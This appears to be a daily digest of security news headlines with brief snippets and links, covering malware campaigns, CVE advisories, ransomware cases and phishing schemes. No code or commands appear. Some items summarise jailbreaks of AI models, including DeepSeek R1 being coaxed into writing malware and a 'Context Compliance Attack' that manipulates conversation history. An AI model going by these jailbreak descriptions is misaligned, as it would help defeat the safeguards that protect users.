News from the specialist press

New MassJacker clipper targets pirated software seekers
Pirated software seekers are targeted by the new MassJacker clipper malware, according to CyberArk researchers. A new malware campaign spreading a new clipper malware dubbed MassJacker targets users searching for pirated software, CyberArk researchers warn. A clipper malware is a type of malicious software designed to intercept and manipulate clipboard data, typically for cryptocurrency theft. […]
https://securityaffairs.com/175433/malware/new-massjacker-clipper-targets-pirated-software-seekers.html

Hackers Attacking Exposed Jupyter Notebooks To Deliver Cryptominer
A novel cryptomining campaign has been identified that exploits misconfigured Jupyter Notebooks, targeting both Windows and Linux systems. The attack leverages exposed instances of Jupyter Notebook, an interactive Python notebook application widely used by data scientists, to deploy malicious code that installs cryptomining software on compromised systems. The campaign begins by exploiting unsecured […]
https://cybersecuritynews.com/hackers-attacking-exposed-jupyter-notebooks/

Cybersecurity in Crypto: Best Practices to Prevent Theft and Fraud
Cybersecurity tips to protect your cryptocurrency from hackers, scams, and fraud. Learn best practices for securing digital assets…
https://hackread.com/cybersecurity-crypto-practices-to-prevent-theft-fraud/

Artificial Intelligence Optimization (AIO): The Next Frontier in SEO
Artificial Intelligence Optimization (AIO) is one of the newest developments in search engine optimization. AIO combines AI technologies with traditional SEO techniques to improve the optimization process. Adopting AI SEO techniques and automation increases the accuracy of reaching the target audience and increases user engagement.
https://hackernoon.com/artificial-intelligence-optimization-aio-the-next-frontier-in-seo?source=rss

AWS SNS Abused To Exfiltrate Data & Phishing Attack
Amazon Web Services Simple Notification Service (AWS SNS) has emerged as a new vector for malicious actors to exfiltrate sensitive data and conduct phishing campaigns. This pub/sub messaging service, designed to enable application-to-person and application-to-application communications, is increasingly being exploited by attackers seeking to bypass traditional security controls and network monitoring. The attacks leverage legitimate […]
https://cybersecuritynews.com/aws-sns-abused/

The Future of Healthcare: How It Can Be Used to Save a Few Billion Lives
A lot of the diagnosis process sometimes feels like guesswork to me. Doctors have to rely on a patient's ability to accurately describe what they're going through. If a doctor has never dealt with a particular illness before, their chances of diagnosing it early in a patient are quite [low]
https://hackernoon.com/the-future-of-healthcare-how-it-can-be-used-to-save-a-few-billion-lives?source=rss

DeepSeek R1 Jailbreaked To Develop Malware, Such As A Keylogger And Ransomware
Cybersecurity researchers have discovered that DeepSeek R1, an open-source large language model, can be manipulated to create functioning malware despite built-in safeguards. The AI model, designed with reasoning capabilities, initially refuses to generate malicious code but can be circumvented through specific prompting techniques. This discovery raises significant concerns about the potential misuse of freely accessible […]
https://cybersecuritynews.com/deepseek-r1-jailbreaked/

OTel Me Why: Why I'm So Excited About OTel
Someone asked me why I was so excited about OpenTelemetry. The reasons have more to do with its innovation and utility than its novelty.
https://hackernoon.com/otel-me-why-why-im-so-excited-about-otel?source=rss

Navigating the Murky Waters of AI and Copyright Law
The ongoing debate about the authorship and ownership of generative content is intense. There are two sides to the AI copyright debate. One contends generative models' work is transformative since they can learn to produce new content. The other argues they are using intellectual property without permission.
https://hackernoon.com/navigating-the-murky-waters-of-ai-and-copyright-law?source=rss

How Ghostgpt Is Empowering Cybercrime in The Age Of AI
Artificial Intelligence (AI) has significantly transformed various sectors, offering tools that enhance efficiency and innovation. However, the emergence of uncensored AI chatbots like GhostGPT has introduced new challenges in cybersecurity…
https://www.cyberdefensemagazine.com/how-ghostgpt-is-empowering-cybercrime-in-the-age-of-ai/

AI Won't Replace Me Yet, But It Might Prove I Was Never That Original
AI won't replace me yet. But what if it proves I was never that original? This essay explores how large language models don't just mimic human writing but reveal how formulaic, predictive, and machine-like most human output has always been. From genre fiction to LinkedIn “Accordion of Wisdom” posts, much of what we call creativity might just be pattern recognition. The real existential crisis? AI isn't making writing soulless—it's exposing the soullessness that was already there.
https://hackernoon.com/ai-wont-replace-me-yet-but-it-might-prove-i-was-never-that-original?source=rss

Building a Bitcoin Wallet from Scratch: Two Months of Solo Development Insights
Nummus will be a custodial wallet that offers a BTC-backed credit card, collateralized loans, and secure custody. The main goal is to ship a clean, functional Bitcoin wallet that demonstrates my ability to deliver, grow, and scale a product to users and potential investors.
https://hackernoon.com/building-a-bitcoin-wallet-from-scratch-two-months-of-solo-development-insights?source=rss

Cisco IOS XR flaw allows attackers to crash BGP process on routers
Cisco addressed a denial of service (DoS) vulnerability that allows attackers to crash the Border Gateway Protocol (BGP) process on IOS XR routers. Cisco has addressed a denial of service (DoS) vulnerability, tracked as CVE-2025-20115, that could allow an unauthenticated, remote attacker to crash the Border Gateway Protocol (BGP) process on IOS XR routers by sending a single BGP […]
https://securityaffairs.com/175421/security/cisco-ios-xr-flaw-cve-2025-20115.html

Like Kermit Once Said: “It's Not Easy Being Green” - AI Environmental Equity
A few months ago, I spoke with Shaolei Ren, an associate professor of computer science at the University of California, Riverside, and his team about their research into the secret water footprint of AI.
https://hackernoon.com/like-kermit-once-said-its-not-easy-being-green-ai-environmental-equity?source=rss

Top Cybersecurity Tools of 2025 To Managing Remote Device Threats
The rise of remote work has significantly increased the attack surface for cybercriminals, making robust cybersecurity tools more critical than ever. As organizations adapt to a world where employees operate from diverse locations, cyber threats targeting remote devices continue to evolve. In 2025, advanced security solutions will help businesses safeguard sensitive data, ensure compliance, and […]
https://cybersecuritynews.com/top-cybersecurity-tools-managing-remote-device-threats/

AutoResponder AI: The Smart Way to Manage Your Gmail Inbox
AutoResponder AI is an AI-powered email assistant that can help you save time and prevent your inbox from overflowing. It checks all your unread emails in Gmail, understands their sentiment, writes the replies for the ones that need a reply and saves them as drafts for you to finalize. When the drafts are ready, it will send you a notification by email or SMS so you are always updated.
https://hackernoon.com/autoresponder-ai-the-smart-way-to-manage-your-gmail-inbox?source=rss

Linear Attention and Long Context Models
Linear Attention variants optimize autoregressive modeling with kernel approximations and efficient normalization. Long-context models promise scalability, but few prove performance gains—Selective SSMs aim to bridge the gap.
https://hackernoon.com/linear-attention-and-long-context-models?source=rss

State Space Models vs RNNs: The Evolution of Sequence Modeling
SSMs integrate selection mechanisms and state expansion to outperform traditional RNNs in sequence modeling. Models like H3, RetNet, and RWKV refine AI efficiency for long-context data, surpassing RNN limitations.
https://hackernoon.com/state-space-models-vs-rnns-the-evolution-of-sequence-modeling?source=rss

How AI Chooses What Information Matters Most
Selection mechanisms refine AI's approach to gating and hypernetworks, enabling structured state space models (SSMs) to handle long-context tasks more efficiently. Mamba leverages this innovation to outperform traditional models in sequence learning.
https://hackernoon.com/how-ai-chooses-what-information-matters-most?source=rss

The TechBeat: Is the U.S. Secretly Accumulating Bitcoin? (3/15/2025)
How are you, hacker? Want to know what's trending right now? The TechBeat by HackerNoon has got you covered with fresh content from our trending stories of the day!
What the Hell Is the Mar-a-Lago Accord and Why Should You Care? By @darragh [8 min read]. Explore Trump's bold Mar‑a‑Lago Accord, a daring plan using century bonds, currency moves, and digital assets to reshape America's economy.
Can AI Really Code? I Put DeepSeek to the Test. By @filestack [7 min read]. I remember the day I first started experimenting with DeepSeek for coding. It felt like stepping into a new dimension where code could almost write itself.
What Is a Diffusion LLM and Why Does It Matter? By @zbruceli [5 min read]. What is diffusion...
https://hackernoon.com/3-15-2025-techbeat?source=rss

How to choose the Correct Severity or CVSS Score for a Bug: A Practical Guide
In the world of bug bounty hunting, one of the most critical aspects of submitting a report is accurately determining the severity or CVSS (Common Vulnerability Scoring System) score of the vulnerability. This helps the development team understand the urgency of the issue and prioritize it accordingly. Choosing the correct severity level not only reflects your understanding of the bug's impact but also affects how seriously your report is taken.
Understanding Severity and CVSS Scores: Severity ratings typically fall into four categories: Low, Medium, High, and Critical. These categories help teams prioritize the remediation efforts based on the potential impact and risk associated with the vulnerability. However, these labels can sometimes oversimplify the issue, which is where the CVSS framework...
https://infosecwriteups.com/how-to-choose-the-correct-severity-or-cvss-score-for-a-bug-a-practical-guide-7a83be0096f3?source=rss----7b722bfd1b8d---4

Network Intrusion Analysis at Scale
Azure, Databricks, and PySpark. Photo by Thomas Jensen on Unsplash.
Introduction: A major problem when cyber security experts are trying to develop new machine-learning-based tools and techniques is a lack of high-quality training sets. To address this, the Canadian Institute for Cybersecurity (CIC) has created and released a number of datasets over the last several years in this area. In this blog post, we'll take a look at one of their datasets, some of the issues that have been found with it, and then we'll upload a corrected version of this data into cloud storage and ultimately into a Python notebook. Specifically, we'll mainly use PySpark, which is an API for using Apache Spark on Databricks, allowing processing of large-scale, distributed data. One such dataset is the CSE-CIC-IDS2018,...
https://infosecwriteups.com/network-intrusion-analysis-at-scale-733169fc29ff?source=rss----7b722bfd1b8d---4

A Website that will be helpful in your Bug bounty and OSINT journey
It is a very helpful site for bug hunters and OSINT investigators.
https://infosecwriteups.com/a-website-that-will-be-helpful-in-your-bug-bounty-and-osint-journey-2c3368346924?source=rss----7b722bfd1b8d---4

Ubuntu Server 22.04 LTS Installation — Step by Step Guide
Hello, my digital adventurers! Today, I am going to show you how to install Ubuntu Server 22.04 LTS.
https://infosecwriteups.com/ubuntu-server-22-04-lts-installation-step-by-step-guide-2e57df92095c?source=rss----7b722bfd1b8d---4

EXIF Geolocation Data: The Overlooked Risk in Uploaded Images
Introduction: A Simple Bug with Hidden Risks
https://infosecwriteups.com/exif-geolocation-data-the-overlooked-risk-in-uploaded-images-4e9af1858772?source=rss----7b722bfd1b8d---4

Powerful Linux Tricks That Will Change Your Life
If you’ve ever worked in a Linux environment, you know how powerful and versatile it can be. But let’s be honest, at first glance the…
https://infosecwriteups.com/powerful-linux-tricks-that-will-change-your-life-bb515d560bcf?source=rss----7b722bfd1b8d---4

Fedora 40: chromium 2025-8fdc09e745 Security Advisory Updates
Update to 134.0.6998.88. High: CVE-2025-1920, Type Confusion in V8. High: CVE-2025-2135, Type Confusion in V8. Medium: CVE-2025-2136, Use after free in Inspector. Medium: CVE-2025-2137, Out of bounds read in V8.
https://linuxsecurity.com/advisories/fedora/fedora-40-chromium-2025-8fdc09e745-security-advisory-updates-dnb8cmibk8bw

Fedora 40: xen 2025-20bd6d94b9 Security Advisory Updates
Deadlock potential with VT-d and legacy PCI device pass-through [XSA-467, CVE-2025-1713].
https://linuxsecurity.com/advisories/fedora/fedora-40-xen-2025-20bd6d94b9-security-advisory-updates-4hzs1atdlc2q

Fedora 41: linux-firmware 2025-7f56eb37a0 Security Advisory Updates
Update to upstream 20250311: amdgpu: many firmware updates; qcom: update GPU firmwares for qcs8300 chipset; add firmware for qat_420xx devices; amdgpu: DMCUB updates for various ASICs.
https://linuxsecurity.com/advisories/fedora/fedora-41-linux-firmware-2025-7f56eb37a0-security-advisory-updates-dtw762njxppu

Fedora 41: chromium 2025-d5935f40af Security Advisory Updates
Update to 134.0.6998.88. High: CVE-2025-1920, Type Confusion in V8. High: CVE-2025-2135, Type Confusion in V8. Medium: CVE-2025-2136, Use after free in Inspector. Medium: CVE-2025-2137, Out of bounds read in V8.
https://linuxsecurity.com/advisories/fedora/fedora-41-chromium-2025-d5935f40af-security-advisory-updates-n2rqdorpmsbd

Mageia 2025-0098: ghostscript Security Advisory Updates
This release addresses CVEs: CVE-2025-27835, CVE-2025-27832, CVE-2025-27831, CVE-2025-27836, CVE-2025-27830, CVE-2025-27833, CVE-2025-27837, CVE-2025-27834. The 10.05.0 release deprecates the non-standard operator "selectdevice"; all code should now be using the standard "setpagedevice" operator.
https://linuxsecurity.com/advisories/mageia/mageia-2025-0098-ghostscript-security-advisory-updates-jn0apv30xjgz

Mageia 2025-0097: man2html man2html Security Advisory Updates
In man2html 1.6g, a specific string being read in from a file will overwrite the size parameter in the top chunk of the heap. This at least causes the program to segmentation abort if the heap size parameter isn't aligned correctly. In versions before GLIBC version 2.29 and if aligned correctly, it allows arbitrary writes anywhere in the program's
https://linuxsecurity.com/advisories/mageia/mageia-2025-0097-man2html-man2html-security-advisory-updates-veow3t9ru337

News from the general press

Seco head Budliger Artieda officially travels to the USA | blue News - Bluewin
... Cyber attack: EC payment not possible in Spar branches. ...
https://www.bluewin.ch/en/news/seco-head-budliger-artieda-officially-travels-to-the-usa-2606408.html

Apple warns billions of iPhone users to update immediately or risk 'extremely sophisticated attack'
Speaking about this, Apple also said the latest zero-day vulnerability was likely used in a cyber-attack on 'specific targeted individuals,' using ...
https://www.unilad.com/technology/apple-warns-iphone-users-update-risk-attack-141670-20250315

EC payment at Spar branches not possible due to cyber attack | blue News - Bluewin
The wholesaler Spar and its TopCC stores have fallen victim to a cyber attack. The systems were extensively affected: IT systems and EC devices ...
https://www.bluewin.ch/en/news/ec-payment-at-spar-branches-not-possible-due-to-cyber-attack-2606427.html

Raymond Ltd Confirms Cyber-Attack On IT Infrastructure, Assures No Disruptions To Retail ...
Leading textile and apparel conglomerate Raymond Limited confirmed a cyber-attack on its IT infrastructure last month.
https://www.freepressjournal.in/business/raymond-ltd-confirms-cyber-attack-on-it-infrastructure-assures-no-disruptions-to-retail-operations

Badlapur Accident: Four Teenagers Drown In Ulhas River While Washing Off Holi Colours
The victims were sent to the Primary Health Center in Badlapur for post-mortem examination. ...
https://www.freepressjournal.in/mumbai/badlapur-accident-four-teenagers-drown-in-ulhas-river-while-washing-off-holi-colours

How Putin could turn off the taps to our cash - Yahoo
Artificial intelligence has allowed hackers to increase the number and sophistication of their attacks. A worst-case scenario cyber attack would be ...
https://www.yahoo.com/news/putin-could-turn-off-taps-130000032.html

How Putin could turn off the taps to our cash - The Telegraph
Yet Professor Woodward sees these problems as indicative of weaknesses of banks to cyber attack. “These outages are typically caused by someone ...
https://www.telegraph.co.uk/money/banking/how-putin-shut-off-britain-bank-accounts/

Infosys settles six class-action lawsuits against US subsidiary for $17.5 million - Upstox
The six class-action lawsuits pertain to a cyber attack, dating November 3, 2023, on IMS systems, which resulted in the “non-availability of certain ...
https://upstox.com/news/market-news/stocks/infosys-settles-six-class-action-lawsuits-against-us-subsidiary-for-17-5-million/article-152776/

Tata Technologies Suffers Ransomware Attack, Sensitive Data Leaked on Dark Web
... Cyber Attack on X Platform – What It Means for the Future of Digital Security (March 12, 2025). ...
https://www.itvoice.in/tata-technologies-suffers-ransomware-attack-sensitive-data-leaked-on-dark-web

Launching counter attack, Kerala CPM leader G Sudhakaran says 'cyber warriors' are not ...
Alappuzha: Unfazed by the cyber attack against him by party supporters, senior CPM leader G. Sudhakaran has dismissed the criticism against him ...
https://english.mathrubhumi.com/news/kerala/senior-cpm-leader-g-sudhakaran-criticises-cyber-attack-against-him-by-cyber-warriors-of-cpm-1.10425719

Starship, carrying Tesla's bot, set for Mars by end 2026, says Elon Musk - LBCI Lebanon
Musk says X hit with 'massive cyber-attack' (LBCI World News, 2025-03-10). ...
https://www.lbcgroup.tv/news/varietytech/843425/starship-carrying-teslas-bot-set-for-mars-by-end-2026-says-elon-musk/en

Anne Arundel County makes progress in recovery efforts after cyber incident - YouTube
... Anne Arundel County Executive Steuart Pittman talks cyber attack (WBFF FOX45 Baltimore). ...
https://www.youtube.com/watch?v=iYr3CttlBlU

Yesterday's news (specialist press)

Coinbase phishing email tricks users with fake wallet migration
A large-scale Coinbase phishing attack poses as a mandatory wallet migration, tricking recipients into setting up a new wallet with a pre-generated recovery phrase controlled by attackers. [...]
https://www.bleepingcomputer.com/news/security/coinbase-phishing-email-tricks-users-with-fake-wallet-migration/

ClickFix: How to Infect Your PC in Three Easy Steps
A clever malware deployment scheme first spotted in targeted attacks last year has now gone mainstream. In this scam, dubbed "ClickFix," the visitor to a hacked or malicious website is asked to distinguish themselves from bots by pressing a combination of keyboard keys that causes Microsoft Windows to download password-stealing malware.
https://krebsonsecurity.com/2025/03/clickfix-how-to-infect-your-pc-in-three-easy-steps/

Threat Actor Impersonates Booking.com in Phishing Scheme
Microsoft detailed a sophisticated campaign that relies on a social engineering technique, "ClickFix," in which a phisher uses security verification like captcha to give the target a false sense of safety.
https://www.darkreading.com/threat-intelligence/threat-actor-booking-com-clickfix-phishing-scheme

Man-in-the-Middle Vulns Provide New Research Opportunities for Car Security
A pair of researchers plan on detailing effective tools to dig into the effectiveness of vehicle cybersecurity without breaking the bank.
https://www.darkreading.com/cybersecurity-operations/mitm-vulns-research-opportunities-car-security

Ransomware Developer Extradited, Admits Working for LockBit
Law enforcement discovered admin credentials on the suspect's computer for an online repository hosted on the Dark Web that stored source code for multiple versions of the LockBit builder.
https://www.darkreading.com/cyberattacks-data-breaches/lockbit-developer-extradited-admits-working-ransomware-group

Metasploit Weekly Wrap-Up 03/14/25
This Metasploit Weekly Wrap-Up saw a deserialization module for CVE-2024-55556, exploiting an unauthenticated PHP deserialization vulnerability in InvoiceShelf.
https://blog.rapid7.com/2025/03/14/metasploit-weekly-wrap-up-03-14-25/

Week-long Exchange Online outage causes email failures, delays
Microsoft says it partially mitigated a week-long Exchange Online outage causing delays or failures when sending or receiving email messages. [...]
https://www.bleepingcomputer.com/news/microsoft/week-long-exchange-online-outage-causes-email-failures-delays/

Symantec Demonstrates OpenAI's Operator Agent in PoC Phishing Attack
Symantec demonstrates OpenAI's Operator Agent in PoC phishing attack, highlighting AI security risks and the need for proper cybersecurity.
https://hackread.com/symantec-openai-operator-agent-poc-phishing-attack/

Threat Actor Tied to LockBit Ransomware Targets Fortinet Users
The Mora_001 group uses similar post-exploitation patterns and ransomware customization originated by LockBit.
https://www.darkreading.com/cyberattacks-data-breaches/actor-tied-lockbit-ransomware-targets-fortinet-users

New Context Compliance Attack Jailbreaks Most of The Major AI Models
A new, surprisingly simple method called Context Compliance Attack (CCA) has proven effective at bypassing safety guardrails in most leading AI systems. Unlike complex prompt engineering techniques that attempt to confuse AI systems with intricate word combinations, CCA exploits a fundamental architectural weakness present in many deployed models. The method works by manipulating conversation history […]
https://cybersecuritynews.com/new-context-compliance-attack-jailbreaks-ai-models/

Ransomware gang creates tool to automate VPN brute-force attacks
The Black Basta ransomware operation created an automated brute-forcing framework dubbed 'BRUTED' to breach edge networking devices like firewalls and VPNs. [...]
https://www.bleepingcomputer.com/news/security/black-basta-ransomware-creates-automated-tool-to-brute-force-vpns/

Cisco IOS XR vulnerability lets attackers crash BGP on routers
Cisco has patched a denial of service (DoS) vulnerability that lets attackers crash the Border Gateway Protocol (BGP) process on IOS XR routers with a single BGP update message. [...]
https://www.bleepingcomputer.com/news/security/cisco-vulnerability-lets-attackers-crash-bgp-on-ios-xr-routers/

Hackers Exploiting Exposed Jupyter Notebooks to Deploy Cryptominers
Cado Security Labs has identified a sophisticated cryptomining campaign exploiting misconfigured Jupyter Notebooks, targeting both Windows and Linux systems. The attack utilizes multiple stages of obfuscation, including encrypted payloads and COM object manipulation, to ultimately deploy miners for various cryptocurrencies including Monero, Ravencoin, and several others. This previously unreported exploitation method demonstrates how threat actors […]
https://gbhackers.com/hackers-exploiting-exposed-jupyter-notebooks/

Black Basta Ransomware Attack Edge Network Devices With Automated Brute Force Attacks
A Russian-speaking actor using the Telegram handle @ExploitWhispers leaked internal chat logs of Black Basta Ransomware-as-a-Service (RaaS) members on February 11, 2025. These communications, spanning from September 2023 to September 2024, have provided security researchers with unprecedented insight into the group’s operational tactics and infrastructure used to target organizations across multiple sectors. Black Basta, which […]
https://cybersecuritynews.com/black-basta-ransomware-attack-edge-network-devices/

Research on iOS apps shows widespread exposure of secrets
A shocking number of iOS apps in Apple's App Store contained hard-coded secrets, secrets that could lead criminals to user data.
https://www.malwarebytes.com/blog/news/2025/03/research-on-ios-apps-shows-widespread-exposure-of-secrets

AWS SNS Exploited for Data Exfiltration and Phishing Attacks
Amazon Web Services’ Simple Notification Service (AWS SNS) is a versatile cloud-based pub/sub service that facilitates communication between applications and users. While its scalability and integration capabilities make it a powerful tool for organizations, its misuse by adversaries for malicious purposes such as data exfiltration and phishing has raised significant security concerns. This article delves […]
https://gbhackers.com/aws-sns-exploited-for-data-exfiltration/

Best WordPress Plugins for Cybersecurity 2025
WordPress is a great platform for building websites, but it is also a common target for hackers. Keeping your website safe is important to protect your data, visitors, and business. Cybercrime is a growing problem, with 39% of UK businesses experiencing cyber attacks in 2023. Using security plugins can help reduce risks and keep your […]
https://www.itsecurityguru.org/2025/03/14/best-wordpress-plugins-for-cybersecurity/?utm_source=rss&utm_medium=rss&utm_campaign=best-wordpress-plugins-for-cybersecurity

CISA Cuts M in ISAC Funding & 100s of Employees
President Trump has long complained about perceived threats to election security. Now his DHS has kneecapped the agencies designed to support it. Experts are worried about what comes next.
https://www.darkreading.com/remote-workforce/cisa-cuts-isac-funding-employees

Hackers Allegedly Selling 3.17 Million Records of Honda Cars India Customers
A hacker operating under the pseudonym “Empire” has allegedly listed a database containing 3,176,958 records from Honda Cars India Ltd for sale on a notorious cybercrime forum. The leaked data reportedly includes sensitive customer information such as names, aliases, addresses, customer IDs, and contact details like mobile numbers and email addresses. The breach is claimed […]
https://cybersecuritynews.com/hackers-allegedly-selling-honda-cars-data/

LockBit ransomware developer Rostislav Panev was extradited from Israel to the U.S.
The US Justice Department announced that the LockBit ransomware developer Rostislav Panev was extradited from Israel to the U.S. The US Justice Department announced that one of the LockBit ransomware developers, Rostislav Panev (51), has been extradited to the United States. The dual Russian-Israeli national was arrested in Israel in 2024 and faces charges related […]
https://securityaffairs.com/175413/cyber-crime/lockbit-ransomware-developer-rostislav-panev-extradited-to-us.html

Suspected LockBit ransomware dev extradited to United States
A dual Russian-Israeli national, suspected of being a key developer for the LockBit ransomware operation, has been extradited to the United States to face charges. [...]
https://www.bleepingcomputer.com/news/security/suspected-lockbit-ransomware-dev-extradited-to-united-states/

Biggest Cyber Threats to the Healthcare Industry Today
Healthcare organizations must enhance their cybersecurity arsenal. Doing so can help them prevent financial, compliance, and reputational damage.
https://www.darkreading.com/vulnerabilities-threats/biggest-cyber-threats-healthcare-industry-today

New Microsoft 365 Phishing Scam Tricks Users Into Calling Fake Support
New Microsoft 365 phishing scam exploits fake support numbers to steal credentials. Learn how attackers bypass security and how to stay protected.
https://hackread.com/new-microsoft-365-phishing-scam-calling-fake-support/

The Cyber Insurance Conundrum
While cybercriminals innovate at lightning speed, cybersecurity teams—led by Chief Information Security Officers (CISOs)—often find themselves relying on outdated playbooks. Cyber insurance, once viewed as the ultimate safety net, is... The post The Cyber Insurance Conundrum appeared first on Cyber Defense Magazine.
https://www.cyberdefensemagazine.com/the-cyber-insurance-conundrum/

Unlocking MSSP Success: Why CTEM is Critical
Discover why Continuous Threat Exposure Management (CTEM) is a game-changer for MSSPs. Learn how a proactive, risk-based security approach helps service providers stand out, reduce exposure, and deliver measurable security improvements.
https://blog.rapid7.com/2025/03/14/unlocking-mssp-success-why-ctem-is-critical/

Remote Access Infra Remains Riskiest Corp. Attack Surface
Exposed login panels for VPNs and remote access systems leave companies open to attack, sometimes tripling the risk of ransomware and making it harder to get cyber insurance.
https://www.darkreading.com/cyber-risk/remote-access-infra-remains-riskiest-corp-attack-surface

CrowdStrike Deep Dives Into DeepSeek And The Risk Of Foreign LLMs
This week in cybersecurity from the editors at Cybercrime Magazine Sausalito, Calif. – Mar. 14, 2025 – Watch the full YouTube Video The Cybercrime Magazine YouTube channel has released the inaugural episode of CrowdStrike’s new Adversary Universe Podcast. The hosts of the first episode, Adam Meyers, CrowdStrike's Head of The post CrowdStrike Deep Dives Into DeepSeek And The Risk Of Foreign LLMs appeared first on Cybercrime Magazine.
https://cybersecurityventures.com/crowdstrike-deep-dives-into-deepseek-and-the-risk-of-foreign-llms/

Edimax Camera RCE Vulnerability Exploited to Spread Mirai Malware
A recent alert from the Akamai Security Intelligence and Response Team (SIRT) has highlighted the exploitation of a severe command injection vulnerability in Edimax Internet of Things (IoT) devices. This vulnerability, designated as CVE-2025-1316, has been actively used by multiple botnets to spread Mirai malware. Mirai is notorious for compromising IoT devices and orchestrating distributed […] The post Edimax Camera RCE Vulnerability Exploited to Spread Mirai Malware appeared first on GBHackers Security | #1 Globally Trusted Cyber Security News Platform.
https://gbhackers.com/edimax-camera-rce-vulnerability/

Application security trends: Shift-left security, AI, and open source malware
Software is at the heart of business operations across most industries, which means application security has never been more critical. However, as organizations embrace cloud-native architectures, microservices, and open source components, the attack surface continues to expand. The result: an ever-growing number of vulnerable and malicious dependencies that adversaries are eager to exploit.
https://www.sonatype.com/blog/application-security-trends-shift-left-security-ai-and-open-source-malware

Cisco Warns of Critical IOS XR Vulnerability Enabling DoS Attacks
Cisco has issued a security advisory warning of a vulnerability in its IOS XR Software that could allow attackers to launch denial-of-service (DoS) attacks. The vulnerability, identified as CVE-2025-20115, affects the Border Gateway Protocol (BGP) confederation implementation. The CVE-2025-20115 vulnerability affects the Border Gateway Protocol (BGP) confederation implementation in Cisco IOS XR Software, potentially allowing […] The post Cisco Warns of Critical IOS XR Vulnerability Enabling DoS Attacks appeared first on GBHackers Security | #1 Globally Trusted Cyber Security News Platform.
https://gbhackers.com/cisco-warns-of-critical-ios-xr-vulnerability/

DeepSeek R1 Jailbreaked to Create Malware, Including Keyloggers and Ransomware
The increasing popularity of generative artificial intelligence (GenAI) tools, such as OpenAI's ChatGPT and Google's Gemini, has attracted cybercriminals seeking to exploit these technologies for malicious purposes. Despite the guardrails implemented by traditional GenAI platforms to prevent misuse, cybercriminals have circumvented these restrictions by developing their own malicious large language models (LLMs), including WormGPT, FraudGPT, […] The post DeepSeek R1 Jailbreaked to Create Malware, Including Keyloggers and Ransomware appeared first on GBHackers Security | #1 Globally Trusted Cyber Security News Platform.
https://gbhackers.com/deepseek-r1-jailbreaked-to-create-malware/

New Context Compliance Exploit Jailbreaks Major AI Models
Microsoft researchers have uncovered a surprisingly straightforward method that can bypass safety guardrails in most leading AI systems. In a technical blog post published on March 13, 2025, Microsoft’s Mark Russinovich detailed the “Context Compliance Attack” (CCA), which exploits the common practice of relying on client-supplied conversation history. The attack proves effective against numerous major […] The post New Context Compliance Exploit Jailbreaks Major AI Models appeared first on GBHackers Security | #1 Globally Trusted Cyber Security News Platform.
https://gbhackers.com/context-compliance-exploit-jailbreaks-major-ai-models/

SuperBlack Ransomware operators exploit Fortinet Firewall flaws in recent attacks
Operators behind the SuperBlack ransomware exploited two vulnerabilities in Fortinet firewalls for recent attacks. Between January and March, researchers at Forescout Research – Vedere Labs observed a threat actor exploiting two Fortinet vulnerabilities to deploy the SuperBlack ransomware. The experts attribute the attacks to a threat actor named “Mora_001”, which uses Russian-language artifacts and exhibits […]
https://securityaffairs.com/175402/cyber-crime/superblack-ransomware-exploited-fortinet-firewall-flaws.html

Securing Your Azure Linux Environment: What's New in Azure Linux 3.0.20250311
Microsoft recently unveiled an important update to its Azure Linux distribution, Azure Linux 3.0.20250311, offering numerous critical package updates that boost security by addressing several CVEs, from core Linux 6.6 LTS kernel updates through popular applications like Curl, InfluxDB and Node.js. Azure Linux users running this release benefit from stronger protection against kernel exploits and common application vulnerabilities that threaten system integrity and security.
https://linuxsecurity.com/news/vendors-products/azure-linux-3-0-20250311-released

Cisco Warns of IOS XR Software Vulnerability That Let Attackers Trigger DoS condition
Cisco has issued security advisories for multiple vulnerabilities affecting its IOS XR Software, with particular emphasis on a significant memory corruption vulnerability in the Border Gateway Protocol (BGP) confederation implementation. The vulnerability tracked as CVE-2025-20115, with a CVSS score of 8.6, could allow unauthenticated, remote attackers to cause denial-of-service conditions on affected network infrastructure. The […] The post Cisco Warns of IOS XR Software Vulnerability That Let Attackers Trigger DoS condition appeared first on Cyber Security News.
https://cybersecuritynews.com/cisco-warns-of-ios-xr-software-vulnerability/

Critical ruby-saml Vulnerabilities Let Attackers Bypass Authentication
Two critical authentication bypass vulnerabilities have been discovered in the ruby-saml library, potentially exposing numerous web applications to account takeover attacks. Security researchers from GitHub Security Lab have identified parser differential vulnerabilities (CVE-2025-25291 and CVE-2025-25292) affecting ruby-saml versions up to 1.17.0, which could allow attackers to impersonate any user within affected systems. GitHub reports that […] The post Critical ruby-saml Vulnerabilities Let Attackers Bypass Authentication appeared first on Cyber Security News.
https://cybersecuritynews.com/ruby-saml-vulnerabilities-bypass-authentication/

Keeper Security Gives Its Partner Programme an update
Keeper Security has announced the launch of the updated Keeper Partner Programme. The updated programme is designed to help organisations of all sizes expand their cybersecurity offerings and unlock new revenue opportunities. As businesses increasingly adopt PAM solutions to protect privileged credentials, secrets and remote access, Keeper's programme provides comprehensive partner tiers, extensive training and […] The post Keeper Security Gives Its Partner Programme an update appeared first on IT Security Guru.
https://www.itsecurityguru.org/2025/03/14/keeper-security-gives-its-partner-programme-an-update/?utm_source=rss&utm_medium=rss&utm_campaign=keeper-security-gives-its-partner-programme-an-update

Lazarus Hackers Exploiting IIS Servers to Deploy ASP-based Web Shells
Researchers have identified a series of sophisticated attacks by the notorious Lazarus group targeting South Korean web servers. The threat actors have been breaching IIS servers to deploy ASP-based web shells, which are subsequently used as first-stage Command and Control (C2) servers that proxy communications to second-stage C2 infrastructure. These attacks, identified in January 2025, […] The post Lazarus Hackers Exploiting IIS Servers to Deploy ASP-based Web Shells appeared first on Cyber Security News.
https://cybersecuritynews.com/lazarus-hackers-exploiting-iis-servers/

Lazarus Group Weaponizes IIS Servers for Deploying Malicious ASP Web Shells
The notorious Lazarus group has been identified as leveraging compromised IIS servers to deploy malicious ASP web shells. These sophisticated attacks have been reported to facilitate the spread of malware, including the LazarLoader variant, and utilize privilege escalation tools to gain extensive control over infected systems. The Lazarus group, associated with North Korean actors, has […] The post Lazarus Group Weaponizes IIS Servers for Deploying Malicious ASP Web Shells appeared first on GBHackers Security | #1 Globally Trusted Cyber Security News Platform.
https://gbhackers.com/lazarus-group-weaponizes-iis-servers/

Critical ruby-saml Vulnerabilities Allow Attackers to Bypass Authentication
A critical security vulnerability has been identified in the ruby-saml library, a popular tool used for Single Sign-On (SSO) via Security Assertion Markup Language (SAML) on the service provider side. The vulnerabilities, designated as CVE-2025-25291 and CVE-2025-25292, allow attackers to bypass authentication and conduct account takeover attacks if they possess a valid signature created with […] The post Critical ruby-saml Vulnerabilities Allow Attackers to Bypass Authentication appeared first on GBHackers Security | #1 Globally Trusted Cyber Security News Platform.
